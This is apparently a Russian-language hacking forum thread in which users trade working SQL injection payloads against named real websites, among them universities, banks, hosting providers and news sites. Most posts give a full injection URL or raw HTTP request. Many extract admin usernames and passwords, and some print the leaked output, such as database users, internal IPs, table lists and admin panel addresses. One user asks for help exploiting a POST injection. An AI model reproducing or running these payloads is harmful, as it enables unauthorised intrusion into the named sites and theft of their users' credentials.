www.miamisci.org/www/employment-detail.php?jobID=1+LIMIT+0,1+UNION+ALL+SELECT+1,1, 1,1,1,1,1,1,CONCAT(0x203d3e20,IFNULL(CAST(cal_emai l+AS+CHAR),0x20),0x207c20,IFNULL(CAST(cal_is_admin +AS+CHAR),0x20),0x207c20,IFNULL(CAST(cal_login+AS+ CHAR),0x20),0x207c20,IFNULL(CAST(cal_passwd+AS+CHA R),0x20),0x20),1,1+FROM+miamisci_calendar_ttec.web cal_user
totenkopf
12.03.2013, 10:33
PR:7
Code:
http://www.alia.org[dot]au/employment/vacancies/listing.html?ID=-2211+UNION+SELECT+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8,9,10,11,12,13,14,15+--+
PR:8
Code:
http://www.interactivedata[dot]de/prdetail.php?pr=290%0aand%0a0%0aUNION%0aSELECT%0a1 ,2,concat_ws(0x3a,user(),version(),database()),4,5 ,6,7,8,9,10,11,12,13,14,15,16+--+
http://www.mirograd.ru/catalog.php?id=-14+union+select+1,2,3,4,group_concat%28table_name% 29,version%28%29,7,database%28%29,9,10,11,12,13,14 ,15,16,17+from+information_schema.tables--&c_id=1416
тиц 180
Code:
http://www.emmaturle .com/gall ery.php?id=-55+union+select+@@ver sion,2,3--
5.0.67-community-log-A-2
вывод в исходнике
skyt5055
18.03.2013, 17:45
скуль на сайте
Народ, вот столкнулся с такой проблемкой: Не получается раскрутить скуль в POST.. Пробывал havij и acunetix - ни чего не получается. Сама ссылка http://vpo.hiik.ru/cgi-bin/soob.pl а POST-запрос: idstud=9299&passw=32631835&soobsh=1'
После такой попытки эксплуатировать, в response headers выскакивает ошибка типа DBD: :mysql::db do failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''', flagproch=1' at line 1 at C:\Moodle19\server\vpocgi-bin\soob.pl line 25
Помогите, пожалуйста! Зараннее огромное спасибо!
nemaniak
18.03.2013, 18:08
conversionchronicles.com PR-5
Code:
www.conversionchronicles.com/print.php?PageID=10'+union+select+111,222,333,444, 555,66,777,888,999,000,concat_ws(0x3a,version(),us er(),database()),121212,131313,141414+--+
Code:
5.0.95:convchron@10.2.3.31:convchron
в исходниках
php.yccd.edu PR-5
Code:
php.yccd.edu/faculty/view_file.php?id=-516'+union+select+concat_ws(0x3a,version(),user(), database()),2,3+--+&type=file
Code:
5.1.66-community:root@localhost:facultypages
Code:
http://consult.ni da.ac.th/ en/pr oject_detail.php?id=-123+union+select+1,2,3,4,5,@@ basedir,7,concat_ws(0 x3a,version(),user(),database()),9,10,11,12,13 ,14,15,16,17,18,19, 20,21,22,23, 24,25,26,27, 28,29,30,31--
www.naukri.com
Яндекс тИЦ (CY): 50
Alexa Rank: 433
Google PageRank (PR): 6
MySQL > 5.0.11 AND time-based blind
Code:
http://w28.naukri.com/advertiser/bms_hits.php?banner=1'+AND+6418=IF((ORD(MID((IFNUL L(CAST(version()+AS+CHAR),0x2
0)),1,1))>64),SLEEP(5),6418)+AND+'QALq'='QALq
version(): '5.1.24-rc-log'
user: 'jobs'@'10.208.64.227'
DBS: 'BMS, bms2, information_schema, test, test_old, zedo_demographics'
MorganFr
20.03.2013, 19:57
Oracle
ТИЦ 60
ПР 2
Code:
absoluttrade.ru/index.php?opt=product&cid1=-2046+union+select+null,null,table_name,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null+from+sys.user_tables--
Вот только раскрутить не получилось. Буду рад помощи в асю.
www.johnlocke.org/fmm/display.html?id=-7937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, (SELECT CONCAT(0x5b20,IFNULL(CAST(user_login AS CHAR),0x20),0x203a20,IFNULL(CAST(user_pass AS CHAR),0x20),0x205d) FROM jlocke.wp_triad_users LIMIT 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL#
Смотрите код.
http://triad.johnlocke.org/blog/wp-login.php
Code:
http://dancukiengiang.gov.vn/news.php?id=157+/**/union/**/+ /**/select/* */+1,2,@@basedir,concat_ws(0x 3a,version(),us er(),database()),5,6, 7,8,9+--+
kosmo987
26.03.2013, 00:47
Сайт ФСКН, что-то очкую ковыряться. Доступ к нескольким БД.
вывод в пути картинки после
http://mcxchakraa.com
http://mcxchakraa.com/buy.php?Id=-2+union+select+1,concat%28admin,0x3a,pass%29,3,4,5 ,6,7,8+from+mcx_admin--
Sql Version: 5.1.68-cll
System User: mcxchakr_mcxcha@localhost
DB User: 'mcxchakr_mcxcha'@'localhost'
Compile OS: unknown-linux-gnu
BlackIce
27.03.2013, 13:16
http://www.profbeauty.com.ua/?catid=-160+union+select+1,table_name,3+from+information_s chema.tables+where+table_schema=database%28%29+lim it+5,1+--+
http://groupegato.com/news.php?id=-2%29+union+select+1,2,3,concat_ws%280x3a,login,pas sword%29,5,6,7,8,9,10,11,12,13,14,15,16+from+site_ _admins+--+
http://www.sweet-crush.com/news.php?id=-2+union+select+1,group_concat%28username,0x3a,pass word%29,3,4,5,6,7,8+from+users+--+
http://www.summermediastudio.com/index.php?b=-1+union+select+1,concat_ws%280x3a,user%28%29,versi on%28%29%29,3+--+
http://www.glebovo.com/moreinfo.html?id=-2+uniOn+selecT+1,2,3,4,5,6,7,8,9,10,version%28%29--
http://www.suncar.kz/info.php?info=11&id=1133+order+by+2
Groove
Флуди меньше, как дитё блать
http://yobiz.ru/view_post_bo.php?id=-127%27+union+select+1,2,3,concat%28user%28%29,0x3a ,database%28%29%29,5,6,7,8,9+--+
Code:
http://yhaigujarat.org/d etails.php?id=-23+union+select+1,concat_ws(0 x3a,version(),user(),database()),3,4,5--
http://www.calidus.ro
http://www.calidus.ro/en/news.php?id=-1+union+select+1,concat(username,0x3a,user_passwor d),3,4+from+users--
Current User: calidus_calidus@68.178.254.206
Sql Version: 5.0.96-community
Compile OS: unknown-linux-gnu
_______________________________________
http://saveraptors.org
http://saveraptors.org/en/news.php?id=-172+union+select+1,2,3,concat(user_name,0x3a,pass_ word),5,6,7,8+from+users--
Current User: saveraptors@localhost
Sql Version: 5.0.96-community
Compile OS: unknown
Админка: http://saveraptors.org/admin/
_______________________________________
http://eyesurgeryeducation.org/
http://eyesurgeryeducation.org/resources-news.php?id=-30+union+select+1,version(),3,4
Current User: meetings_multi@199.167.72.67
Sql Version: 5.5.29-log
Compile OS: Linux
_______________________________________
http://www.moreanartscenter.org/
http://www.moreanartscenter.org/news.php?id=-3102+union+select+1,concat(login_username,0x3a,log in_password),3,4,5,6,7,8,9,10,11,12+from+login--
Current User: morean_user@localhost
Sql Version: 5.0.45
Compile OS: redhat-linux-gnu
_______________________________________
http://www.fairexpo.kz/
http://www.fairexpo.kz/news.php?id=-9+union+select+1,2,table_name,4,5+from+INFORMATION _SCHEMA.TABLES+where+table_schema=0x762D313632385F 666169726578706F--
Current User: v_1628_dbuser@localhost
Sql Version: 5.0.91
Compile OS: redhat-linux-gnu
_______________________________________
http://www.reef-entertainment.com/
http://www.reef-entertainment.com/news.php?id=28+union+select+1,2,concat(name,0x3a,p assword),4,5+from+users--
Current User: craig123@clayton.dreamhost.com
Sql Version: 5.0.95
Compile OS: redhat-linux-gnu
_______________________________________
http://photoholiday.ru/
http://photoholiday.ru/news.php?id=-41699+union+select+1,2,3,4,5,version()
Current User: localhost
Sql Version: 5.0.92
Compile OS: linux-gnu
_______________________________________
http://www.lowcarbonliverpool.com
http://www.lowcarbonliverpool.com/news_detail.php?id=35+union+select+1,concat%28unam e,0x3a,pword%29,3,4,5,6,7+from+USERS--
Current User: mylcluser@192.168.0.7
Sql Version: 5.5.25a-log
Compile OS: Linux
_______________________________________
http://www.alohau.com
http://www.alohau.com/news.php?id=-17+union+select+1,2,3,4,5,6,concat%28email,0x3a,us ername,0x3a,password%29,8,9,10,11,12,13,14+from+al oha_staff+Limit+1,2--
Current User: alohau@68.178.254.206
Sql Version: 5.0.96-log
Compile OS: unknown-linux-gnu
_______________________________________
http://www.ontariofriesianhorse.com
http://www.ontariofriesianhorse.com/PAGES/news_detail.php?id=57+union+select+1,concat(Email, 0x3a,username,0x3a,password),
3,4,5,6,7,8+from+customer+Limit+1,75--
Current User: dbo254601180@74.208.16.163
Sql Version: 5.1.67-log
Compile OS: pc-linux-gnu
Админка: http://www.ontariofriesianhorse.com/admin/
_______________________________________
http://www.florida-cricket.com
http://www.florida-cricket.com/news_detail.php?id=-30+union+select+1,
concat(email,0x3a,uname,0x3a,pass),
3,4,5+from+admin_tb--
Current User: floridac@72.167.232.190
Sql Version: 5.0.96-log
Compile OS: pc-linux-gnu
_______________________________________
http://www.futuresfins.com
http://www.futuresfins.com/fin-detail.php?id=-173+union+select+concat(username,0x3a,password),2, 3,4,5,6,7,8,9,10,11+from+users
Current User: Future_future2@localhost
Sql Version: 5.1.54-0.dotdeb.0
Compile OS: debian-linux-gnu
Code:
http://www.gusr.ru/torgy/item.php?id=-26+union+sele ct+1,2,3,4,concat_ws(0x3a,version( ),user(),database()),6,7,8--
Улыбайся
04.04.2013, 13:04
http://www.8tv.ru/?id=12&hotnews=23664
Havij
Host IP: 217.16.26.135
Web Server: Apache/2.2.14 (Ubuntu)
Powered-by: PHP/5.3.2-1ubuntu4.19
Keyword Found:
Injection type is Integer
DB Server: MySQL >=5
Current DB: 8tv
MySQL error based injection method can be used!
Сайт 8 канала, пользователей и паролей не нашел, удалять или изменять бд ещё не умею, кто умеет добавьте новость
Code:
http://old.cageprisoners.com/articles.php?id=-25632+union+select+1,2,@@version,4,5,6--
mamboserver.com
Яндекс тИЦ (CY): 220
Alexa Rank: 211,585
Google PageRank (PR): 7
MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Code:
http://mamboserver.com/?submit=1%27%20AND%20%28SELECT%207050%20FROM%28SEL ECT%20COUNT%28%2A%29%2CCONCAT%280x3a7767773a%2C%28 MID%28%28IFNULL%28CAST%28version%28%29%20AS%20CHAR %29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a6375643a%2CF LOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION _SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20A ND%20%27JrEg%27%3D%27JrEg
version(): '5.0.45'
banner:
web server operating system: Linux Ubuntu
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.45
dbs:
information_schema
cyl0n_linkm
cyl0n_prmanager
test
Code:
http://www.churchbuyinggroup.co.uk/newsitem.php?news_id=-9+union+selec T+1,2,3,4,@@bas edir,6,concat_ws(0x3a,version(),user(),datab ase())--
5.0.45-community-nt:churchdbuser@localhost:church
хостинги, домены etc
1. хостинг uh.ua - крупнейший хостинг в Украине!
:FACEPALM:
Скуля в хидере X-Forwarded-For
MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Code:
GET / HTTP/1.1
Accept-encoding: gzip,deflate
X-Forwarded-For: ' AND (SELECT 5745 FROM(SELECT COUNT(*),CONCAT(0x3a6c71613a,(MID((IFNULL(CAST(ver sion() AS CHAR),0x20)),1,50)),0x3a76636b3a,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'lol'='lol
Host: uh.ua
Accept: text/html
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.1 Safari/532.2
Connection: close
version(): '5.0.51a-community-log'
dbs:
ukrhost_dba
ukrhost_db
2. хостинг www.kosmohost.com - это ключ к надежности, успеху и процветанию Вашего бизнеса в сети Интернет!
Ага, надежности
MySQL UNION query (NULL) - 10 columns
Code:
www.kosmohost.com/catclient.php?cat=1%20UNION%20ALL%20SELECT%20NULL% 2CNULL%2CNULL%2CNULL%2CCONCAT%280x3a7869653a%2CIFN ULL%28CAST%28version%28%29%20AS%20CHAR%29%2C0x20%2 9%2C0x3a767a623a%29%2CNULL%2CNULL%2CNULL%2CNULL%2C NULL%23
version(): '5.5.27'
dbs:
r000100_hosting
3. www.hostobzor.ru - эпицентр русскоязычного хостинга
AND boolean-based blind - WHERE or HAVING clause
Code:
www.hostobzor.ru/certified/info.php?pid=1%27%20AND%20ORD%28MID%28%28IFNULL%28 CAST%28version%28%29%20AS%20CHAR%29%2C0x20%29%29%2 C11%2C1%29%29%3E1%20AND%20%27TvIu%27%3D%27TvIu
version(): '5.0.90-log'
dbs:
srv21398_ho
srv21398_ho20
test
4. www.imget.ru - бесплатный хостинг изображений
Скуля в параметре login для /login.php
а также в Cookies в параметре login везде
MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Code:
POST /login.php HTTP/1.1
Accept-encoding: gzip,deflate
Accept: text/html
User-agent: Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Host: www.imget.ru
Pragma: no-cache
Cache-control: no-cache,no-store
Content-type: application/x-www-form-urlencoded
Content-length: 323
Connection: close
login=1%27%20AND%20%28SELECT%203052%20FROM%28SELEC T%20COUNT%28%2A%29%2CCONCAT%280x3a686b793a%2C%28MI D%28%28IFNULL%28CAST%28version%28%29%20AS%20CHAR%2 9%2C0x20%29%29%2C1%2C50%29%29%2C0x3a6175683a%2CFLO OR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_S CHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND %20%27zfeS%27%3D%27zfeS
version(): '5.1.63-0+squeeze1-log'
dbs:
imget
и на закуску
5. namecom.ru - продажа зарегистрированных доменов, барыжат доменами от 1000 баксов, даже себя продают =/
MySQL UNION query (NULL) - 3 columns
Code:
namecom.ru/page.php?id=-6835%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280 x3a6c756a3a%2CIFNULL%28CAST%28version%28%29%20AS%2 0CHAR%29%2C0x20%29%2C0x3a7578623a%29%2CNULL%23
version(): '5.0.51a-community'
dbs:
admin_clubegoist
admin_cocovoyage
admin_coevent2
admin_domainfest
admin_multiviza
admin_mumm
admin_namecom
admin_orbico
admin_shestakoff
admin_topsignature
admin_travelcenter
admin_zelkor
information_schema
http://er.tambov.ru/photoalbum.php?albumid=1+UNION+ALL+SELECT+NULL,'PU TIN%20-%20VAFEL!',NULL#
http://f1.s.qip.ru/E2nOmMlK.jpg
http://database.gsdog.ru/dog.php?screen=1&id=-243+union+select+1,2,3,4,group_concat%28table_name %29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26+from+information_schema.tables&SID=e86ef0fb67f63386de0bb8b9d9ac9228
http://database.gsdog.ru/dog.php?screen=1&id=-243+union+select+1,2,3,4,group_concat%28column_nam e%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26+from+information_schema.columns+wher e+table_name=0x7573657273&SID=e86ef0fb67f63386de0bb8b9d9ac9228
http://database.gsdog.ru/dog.php?screen=1&id=-243+union+select+1,2,3,4,concat_ws%280x3a,id,name, password,role,fio,email%29,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26+from+users&SID=e86ef0fb67f63386de0bb8b9d9ac9228
http://www.biprint.ru/index.php?area=link&cat=2&id=-17+union+select+1,user%28%29,3,4,5,6,7,8,9,10
pr6 основной домен pr8 инст какой-то
http://mme.uwaterloo.ca/~camj/people/index.php?id=28+and+1=2+union+select+1,database(), 3,4,5,6,7,8,9,10,11,12,13+--+
Code:
http://www.toantamtax.vn/public/news.php?id=-2+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9,10
5.0.92:toantamt_data1@localhost:toantamt_data1
http://lel.khv.ru/img/poems/ttl04.gif
Яндекс тИЦ (CY) 475
Google PageRank (PR) 4
Яндекс Каталог
DMOZ.org каталог
Code:
http://lel.khv.ru/poems/resultik.phtml?id=-1761+union+select+1,database(),version(),user()--
http://www.l2db.ru/themes/l2db/images/db.logo.png
Яндекс тИЦ (CY) 325
Google PageRank (PR) 4
Яндекс Каталог
траф 15к
Code:
http://www.l2db.ru/npc/index/2/rg/all/all/8/all/%5C'))+and+extractvalue(rand(),concat(0x3a,version (),0x3a,user()))+--+
http://www.landscrona.ru/images/tpl/logo.png
Яндекс тИЦ (CY) 475
Google PageRank (PR) 4
Яндекс Каталог
DMOZ.org каталог
Code:
http://www.landscrona.ru/media/index.php?id=-3105+union+select+1,2,3,user(),database(),version( ),7,8,9,10,11,12,13,14,15--
http://kosmet.pro/images/t2.jpg
Google PageRank (PR) 3
Code:
http://kosmet.pro/index.php?id=-107+union+select+1,version(),database(),user(),5--
Code:
http://www.f1-world.ru/champ2012/qualres.php?id=12209 UNION ALL SELECT 1,1,1,1,1,CONCAT(0x7c20,IFNULL(CAST(Email AS CHAR),0x20),0x3a,IFNULL(CAST(NickName AS CHAR),0x20),0x3a,IFNULL(CAST(PassWd AS CHAR),0x20),0x207c),1,1,1,1,1 FROM f1world.fusers#
http://www.dazer.ru/news/?id=-1+union+select+1,version%28%29,3,4,5
http://www.diavia.ru/index.php?part_id=-15310+union+select+1,user%28%29
LomasterII
21.04.2013, 10:17
Юридический сайт
http://www.yurclub.ru/catalog/geo.list.php?s=300'+and+1=0+union+select+1,version ()+--+
database: npyurclub_ctlg
version: 5.5.27
user: npyurclub_ctlg@localhost
Code:
http://www.davidgerstein.com/list.ph p?cat=2&&scat=-76+union+select+@ @versi on+--+
http://www.pitiviti.org/initiatives/eldp/participant.php?id=-19+union+select+1,database(),3,4,user(),6,7,8,9,10 ,11,12--
db: Eldpgrads
user: eldpgrads@68.178.254.235
http://www.disabilityadvocates.us/story.php?id=-1+union+select+1,database(),user()--
db:db271044565
user:dbo271044565@74.208.16.234
http://www.kristofbuntinx.com/post.php?id=-40+union+select+1,2,database(),user(),5--
db:kristof_buntinx
user:kristof_versace@localhost
version:5.1.68-cll
http://www.semsk.kz/newscat.php?id=-9+union+select+1,2,3,4,5,database(),7,8,9,10,11,12 ,version(),14,user()--
db:semsk_main
user:semsk_main@localhost
version:5.0.95
Code:
http://www.miragallery.com/Ayala Ba r.p hp? c ati d=-237 +union+select+concat_ws(0x3a,ve rsion(),us er(),databas e()),2+--+
тиц 70
http://www.avpu.ru/news.php?id=-1+union+select+12,3,4
db:avpu
avpu2
user:avpu@localhost
version:5.1.49-community
http://wheriz.es/blog.php?id=25+union+select+1,2,3,version%28%29,da tabase%28%29,user%28%29,7--
Code:
http://kiemlamkiengiang.gov.vn/news.php?id=46+/**/union/**/+/* */select/**/+1,2,@ @basedir,concat_ws(0x3a,ver sion(),user(),database()),5,6,7,8,9+--+
amitour.ru
PHP:
http://www.amitour.ru/new/hotels/hotel_card.php?id=6746+or+1+group+by+concat%28%28s elect+version%28%29%29,0x00,floor%28rand%280%29*2% 29%29having+min%280%29+or+1--+
(CY) 150
(PR) 4
5.1.41-log
=============================================
masterdoor.ru
PHP:
http://www.masterdoor.ru/index.php?link=2150%27+or+1+group+by+concat%28%28s elect+version%28%29%29,0x00,floor%28rand%280%29*2% 29%29having+min%280%29+or+1--+
(CY) 30
(PR) 2
5.1.49-rel11.3-log
==============================================
Code:
http://senesco.com/newsitem.php?id=-211+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5--
http://bshina.ru/diski/disk.php?id=2+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,version%28%29
http://www.grafikraboty.ru/month.php?id=-2+union+select+1,2,version%28%29,4,5
http://www.parekhgroup.in/fuel.php?id=-3+union+select+1,2,3,4,concat_ws%280x3a,admin_id,a dmin_user,admin_pass%29,6,7,8,9,10+from+admin_mana gement
http://agent.dp.ua/index.php?id=-1+union+select+1,concat_ws(0x3a,%20database(),%20v ersion()),3,4--+
http://xor.com.ua/index.php?id=1+union+select+concat_ws(0x3a,databas e(),version())--
http://roman-coins.com.ua/index.php?id=-1+union+select+1,concat_ws(0x3a,version(),database ()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
xxxxxxxxxx
sia.ru
PHP:
http://sia.ru/?section=484&action=show_news&id=-255045+union+select+1,2,3,4,5,6,7,version%28%29,9, 10--+
(CY) 700
(PR) 4
5.5.9-log
=============================================
www.zaki.ru
PHP:
http://zaki.ru/pagesnew.php?id=2684+or+1+group+by+concat%28%28sel ect+version%28%29%29,0x00,floor%28rand%280%29*2%29 %29having+min%280%29+or+1--+
(CY) 240
(PR) 5
5.5.30-1~dotdeb.0-log
==============================================
www.wmag.ru
PHP:
http://www.wmag.ru/search.php?page=3&search=%EA%EE%ED%F2%E0%EA%F2%EE%F0%FB%27%29+or+1+g roup+by+concat%28%28select+version%28%29%29,0x00,f loor%28rand%280%29*2%29%29having+min%280%29+or+1--+
(CY) 50
(PR) 2
4.1.22-lk-log
=============================================
machanaim.org
PHP:
http://www.machanaim.org/faq/q_show.php?id=1+or+1+group+by+concat%28%28select+v ersion%28%29%29,0x00,floor%28rand%280%29*2%29%29ha ving+min%280%29+or+1--+
(CY) 850
(PR) 5
4.1.24-log
=============================================
investstanok.ru
PHP:
http://www.investstanok.ru/cnccenters/id=652+or+1+group+by+concat%28%28select+version%28 %29%29,0x00,floor%28rand%280%29*2%29%29having+min% 280%29+or+1--+
(CY) 274
(PR) 3
5.0.37-standard
=============================================
LomasterII
29.04.2013, 17:48
вот вам
astra.enaza.ru/swgo/?i=100209'+and+1=0+union+select+1,2,user()+--+
вывод в адресной строке, посмотрите)))
первый раз такую встречаю)
LomasterII
01.05.2013, 23:24
http://supercomp.kiev.ua/index.php?menu=95&add=50110339+and+1=0+union+all+select+1,user(),3,4 ,5,6,7,8
http://spcala.com/special_events/event.php?id=999.9+union+select+1,2,3,4,5,6,7,8,VE RSION(),10,11,12,13
Agricultural Development Bank of Ghana
Code:
http://agr icbank.com/en/products-services/products.php?c=4&p=-21+union+sele ct +1,conc at_ws(0x3a,version(),user( ),da tabase()),@@ basedir,4,5,6,7, 8,9,1 0,11--
http://www.ul.ac.za/conf/main/index.php?Entity=Conference_Information&TheID=79';+select+cast(username||chr(58)||password +as+int)+from+users.admin--
Fidelity Bank Ghana
Code:
http://www.fidelitybank.com.gh/en/products-services/pro duct s.php?c=9&p=-1+union+select+1,con cat_ws(0x3a,v ersion(),user(),da tabase()),3,4,5,6,7,8,9,10,11--
http://www.bgci.org/garden.php?id=787
PR7, blind
http://www.romecentral.com/article_list_singleeventpage.php?id=-43+union+select+1,2,3,4,5,6,7,8,9,0,1,version()--
PR3
http://www.real-samui-properties.com/detail.php?id=-483+union+select+1,2,3,4,5,6,7,8,version(),0,1,2,3 ,4,5,6,7,8,9--
PR3
4.1.22-standard
http://www.kantine.com/detail.php?id=-1019+union+select+1,2,3,4,version(),6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4--
PR4
LomasterII
04.05.2013, 09:20
kooler said:
http://www.bgci.org/garden.php?id=787
PR7, blind
ну ты и подкинул скулю:
www.bgci.org/garden.php?id=787'+and+1=0+union+select+1,2,3,user (),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,7 2,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88, 89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,1 04,105,106,107,108,109,110,111,112,113,114,115,116 ,117,118,119,120,121,122,123,124,125,126,127,128,1 29,130,131,132,133,134,135+--+
BeebleBrox
06.05.2013, 00:14
mssql 5
http://baumanec.bmstu.ru/global.php?news=-40+union+select+null,null,version(),null,null,null ,null,null,null,null--
www.seaofstories.com/title.php?id=-5571+union+select+1,database(),3,4--
db: seaofstories
user: seaofstories@localhost
ver: 5.5.30-30.1
http://www.sp-top.ru/top.php?cat=-2+union+select+1,2,3,4,database(),user(),7,8,9,10, 11,12,13,version(),15,16,17,18,19,20,21,22--
db: mblport2_user
user: seaofstories@localhost
ver: 5.0.51a-24+lenny4
http://www.genhound.co.uk/search_doc.php?id=-930+union+select+@@version,2,3+--+
genhou5_genhound@localhost
Linux
5.5.30-cll
genhou5_genhound
http://yvary.fi/index.php?subj=-5+union+select+1,2,3,4,group_concat(0x0A,version() ,database(),user()),6,7--
5.0.96-community
yvaryfi_mcm
yvaryfi_admin@localhost
http://lgtu.info/index.php?subj=-5+union+select+group_concat(version(),0x3a,databas e(),0x3a,user())--
5.5.29-0ubuntu0.12.04.2
lgtu
lgtu@localhost
http://www.monte-carlo-drifters.com/index.php?subj=-5+union+select+1,2,3,4,5,version(),7,8,9--
http://occupationrecords.com/newsitem.php?id=-7+union+select+1,2,database(),4,user(),6,version() ,8,9,10,11--
db: occurec_site
version: 5.5.30-cll
user: occurec_user@localhost
http://cinemarays.com/gallery.php?id=-431+union+select+1,group_concat(database(),version (),user()),3,4,5,6,7--
db: cinemcjy_cinemarays
ver: 5.1.59-rel13.0
user: logcinemcjy_cinema@localhost
http://www.abc-consultancy.com/newsitem.php?id=-29+union+select+1,2,database(),4,group_concat(tabl e_name),6,7 from information_schema.tables where table_schema= database()
db: abcconsu_abc_consultancy_com
user: abcconsu_antweb@localhost
ver: 5.1.68-cll1
+ названия таблиц
http://magsneaks.com/preview.php?id=-35+union+select+1,group_concat(table_name),user(), database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,version(),46,47,48 from information_schema.tables where table_schema=database()
db: magnolia_magsneaks
user: magnolia@74.52.132.2
ver: 5.5.25a
table: MOVIES
http://www.edizionicapone.com/layout.php?id=-200+union+select+1,version(),group_concat(table_na me),4,5,6,7,@@datadir,database(),user(),11,12,13,1 4,15,16,17,18 from information_schema.tables where table_schema=database()
db: Sql99578_1
user: Sql99578@62.149.130.60
ver: 5.0.92-enterprise-gpl-log
tables: autori, cappelli, distributori, download, librerie,libri,link,news,oggetti, ordini, ordini_articoli, oroscopo, temi
http://www.1000vaches.com/voir.php?id=-1179+union+select+1,group_concat(table_name),datab ase(),4,5,6,7,8 from information_schema.tables where table_schema= database()
db: db254839555
user: dbo254839555@212.227.114.165
ver: 5.1.67-log
tables: categories,edito,liens,membres,photos,photos_du_mo is,prix
http://www.vkt.ru/images/logo_trans_vkt.png
vkt.ru
PHP:
http://www.vkt.ru/index.php?mod=prog&id=51%27+or+1+group+by+concat%28%28select+version% 28%29%29,0x00,floor%28rand%280%29*2%29%29having+mi n%280%29+or+1--+
(CY) 180
(PR) 4
5.1.45
===============================================
neocom72.ru
PHP:
http://neocom72.ru/index.php?id=5&price=2+or+1+group+by+concat%28%28select+version%2 8%29%29,0x00,floor%28rand%280%29*2%29%29having+min %280%29+or+1--+
(CY) 19000
(PR) 0
5.1.41-log
Code:
http://www.treatmentinpoland.com/clinic.php?l=l6&id=-5+union+select+1,2,3,4,5,6,7,@@version+--+
Еще сами сайты делают =)
Code:
http://www.inetstudio.ru/project.php?p=3&id=183+union+select+1,user(),3--+1
u48680@10.8.1.188
5.0.95-log
Какой то шоп
http://mydanceaton.com/profile.php?uid=3+union+select+1,2,3,4,5,6,7
Система учета энергоресурсов
http://ienergi.info/index.php?sel=system&id=-1+union+select+1,group_concat%28table_name%29,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26+from+information_schema.tables
uralpress.ru
Челябинск - новости города и Челябинской области
Тиц 3 800
Яндекс Каталог Да
Проиндексировано 142 000
http://uralpress.ru/english/show_region.php?id=-1+union+select+1,2,version%28%29,4
Электронная еврейская энциклопедия - ЭЕЭ
Яндекс тИЦ 1 200
Яндекс Каталог Да
Проиндексировано 7 000
http://www.eleven.co.il/print.php?id=-14609+union+select+1,2,concat_ws%280x3a,username,u ser_password,user_email%29,4,5,6,7,8,9,10+from+ele venbb.phpbb_users
http://
www.actualimages.com/voir.php?id=-2335+union+select+1,database(),group_concat(table_ name),4,5,6,7,8 from information_schema.tables where table_schema= database()
==========================================
http://
chacocanyoncafe.com/index.php?CID=-52+union+select+1,2,group_concat%28table_name%29,4 %20from%20information_schema.tables%20where%20tabl e_schema=%20database%28%29
==========================================
http://
taoswebb.com/region.php?id=-10+union+select+1,2,group_concat%28user%28%29,data base%28%29,version%28%29%29,4,5,6,7,8--
==========================================
http://
www.gdhxgf.com/show_new.php?id=-89+union+select+version(),2,3,4--
==========================================
http://
www.donaldsoneducation.com/news_full.php?id=-196+union+select+1,version%28%29,database%28%29,gr oup_concat%28table_name%29,5,6,7%20%20from%20infor mation_schema.tables%20where%20table_schema=%20dat abase%28%29
==========================================
http://
www.sportphillip.com.au/news_full.php?id=-38+union+select+1,group_concat%28database%28%29,0x 5e,user%28%29,0x5e,version%28%29%29,3,4,5,6,7,8,9--
==========================================
Code:
http://www.mysterytomastery.com/products/?pid=1+/**/union/**/+/**/select/**/+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
5.1.56-log:'mcmtm'@'208.113.128.0/255.255.128.0':mcm2m
http://
www.surgicaltrip.com/learn-more.php?id=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8--
==========================================
Code:
http://gepec.cat/show_new.php?id=-21+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7--
http://
brokervv.ru/novosti.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),group_concat(table_name) from information_schema.tables where table_schema= database()
==========================================
http://
www.arhbum.com/novosti.php?id=-4+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),group_concat(column_name),4 from information_schema.columns where table_name= 0x61646D696E6C697374
==========================================
Code:
